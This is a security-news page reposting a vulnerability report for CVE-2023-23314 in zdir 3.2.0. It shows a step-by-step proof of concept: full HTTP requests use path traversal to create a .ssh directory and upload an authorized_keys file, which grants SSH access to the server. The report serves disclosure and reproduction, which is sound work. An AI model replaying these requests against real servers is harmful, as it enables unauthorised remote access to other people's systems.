Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-23314: File upload ssh authorized_keys causes RCE · Issue #90 · helloxz/zdir

An arbitrary file upload vulnerability in the /api/upload component of zdir v3.2.0 allows attackers to execute arbitrary code via a crafted .ssh file.

CVE
Open in Source
#vulnerability#web#windows#apple#linux#js#git#rce#auth#ssh#chrome#webkit

The steps to reproduce.

zdir version: 3.2.0

git clone https://github.com/helloxz/zdir

go run main.go init

modify file: /zdir/data/config/config.ini

start

View routes, the interface requires login credentials

Enter the controller.Mkdir method, the parameters submitted by the post request are name and path

Enter the !V_dir method and find that it is only to judge whether the passed path is a folder

This creates a .ssh directory using directory traversal

POST /api/dir/create HTTP/1.1
Host: 127.0.0.1:6080
Content-Length: 28
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
X-Token: 433a01baeaa6c37ef46f21621cc06f95
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: application/json, text/plain, */*
X-Cid: bPlNFG
sec-ch-ua-platform: "Linux"
Origin: http://127.0.0.1:6080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:6080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: USERNAME=admin; CID=bPlNFG; TOKEN=433a01baeaa6c37ef46f21621cc06f95
Connection: close

path=/../../../../&name=.ssh

Enter the controller.Upload method, you can specify the upload path

There is a loophole in the regex to determine whether the path is legal, and you can use /…/ to bypass it

Determine whether the folder exists, and terminate execution if it does not exist. So use the above directory traversal to create a folder, and then upload the file name without renaming it.

POST /api/upload HTTP/1.1
Host: 127.0.0.1:6080
Content-Length: 897
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqjo68lEJ6LlJ8zdA
X-Token: 433a01baeaa6c37ef46f21621cc06f95
X-Cid: bPlNFG
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
sec-ch-ua-platform: "Linux"
Accept: */*
Origin: http://127.0.0.1:6080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:6080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: USERNAME=admin; CID=bPlNFG; TOKEN=433a01baeaa6c37ef46f21621cc06f95
Connection: close

------WebKitFormBoundaryqjo68lEJ6LlJ8zdA
Content-Disposition: form-data; name="path"

/../../../../../../home/kali/.ssh
------WebKitFormBoundaryqjo68lEJ6LlJ8zdA
Content-Disposition: form-data; name="file"; filename="authorized_keys"
Content-Type: text/plain

ssh-rsa

------WebKitFormBoundaryqjo68lEJ6LlJ8zdA--

Generate an ssh public key for upload

Then you can use ssh to connect to the server

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE